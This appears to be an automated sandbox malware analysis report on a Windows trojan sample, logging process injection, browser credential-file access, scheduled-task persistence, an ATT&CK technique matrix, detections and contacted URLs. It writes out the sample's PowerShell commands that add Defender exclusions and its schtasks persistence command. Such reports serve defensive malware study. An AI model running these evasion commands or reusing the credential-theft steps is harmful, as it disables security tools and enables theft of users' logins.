            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\CFV20240600121.exe Memory written: C:\Users\user\Desktop\CFV20240600121.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Memory written: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: NULL target: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\CFV20240600121.exe Section loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe protection: read write
            Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\write.exe Thread register set: target process: 7812
            Source: C:\Windows\SysWOW64\write.exe Thread APC queued: target process: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp"
            Source: C:\Users\user\Desktop\CFV20240600121.exe Process created: C:\Users\user\Desktop\CFV20240600121.exe "C:\Users\user\Desktop\CFV20240600121.exe"
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp"
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe Process created: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe"
            Source: C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
            Source: C:\Windows\SysWOW64\write.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000000.2308691425.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4524115081.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000000.2451899936.0000000001121000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000000.2308691425.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4524115081.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000000.2451899936.0000000001121000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000000.2308691425.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4524115081.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000000.2451899936.0000000001121000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000000.2308691425.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4524115081.0000000001021000.00000002.00000001.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000000.2451899936.0000000001121000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\CFV20240600121.exe Queries volume information: C:\Users\user\Desktop\CFV20240600121.exe VolumeInformation
            Source: C:\Users\user\Desktop\CFV20240600121.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\CFV20240600121.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\CFV20240600121.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\CFV20240600121.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeQueries volume information: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\CFV20240600121.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match; File source: 12.2.CFV20240600121.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 12.2.CFV20240600121.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\write.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\write.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\write.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\write.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\write.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\write.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\write.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\write.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\write.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match; File source: 12.2.CFV20240600121.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 12.2.CFV20240600121.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            [Behavior graph: ID 1454436, Sample: CFV20240600121.exe, Startdate: 10/06/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            CFV20240600121.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
            CFV20240600121.exe | 42% | Virustotal | | Browse
            CFV20240600121.exe | 100% | Joe Sandbox ML | |

            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe | 100% | Joe Sandbox ML | |
            C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |

            No Antivirus matches

            Source | Detection | Scanner | Label | Link
            td-ccm-neg-87-45.wixdns.net | 0% | Virustotal | | Browse
            www.am1-728585.com | 1% | Virustotal | | Browse
            www.zhuan-tou.com | 1% | Virustotal | | Browse
            www.witoharmuth.com | 0% | Virustotal | | Browse
            www.magnoliahairandco.com | 0% | Virustotal | | Browse
            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%Avira URL Cloudsafe
            http://www.ie8mce.website/3osa/0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%VirustotalBrowse
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            https://www.witoharmuth.de/verkehrswende/0%Avira URL Cloudsafe
            http://www.mg55aa.xyz/2c61/?TTv82Lg=RJfS4vARZYm/oi22NSuVxsKXUXvAzLUuwV1pBI27iejWxHvYHo2LN7gu8qRYW6QqNtSAiHHGlyBTLaey7TeG8lKmZ3wdB0uWw8RQPkcPoCC9P3J1+WeEqjNfAM7KpTz+0w==&kH=00U8ENLHk0%Avira URL Cloudsafe
            https://themeisle.com0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%VirustotalBrowse
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%VirustotalBrowse
            https://www.witoharmuth.de/verkehrswende/0%VirustotalBrowse
            http://www.onelook.com/?w=0%Avira URL Cloudsafe
            https://track.uc.cn/collect0%Avira URL Cloudsafe
            http://www.onelook.com/?w=2%VirustotalBrowse
            https://www.west.cn/services/mail/0%Avira URL Cloudsafe
            https://www.witoharmuth.de/kontakt/0%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-content/themes/hestia/assets/js/script.min.js?ver=3.0.210%Avira URL Cloudsafe
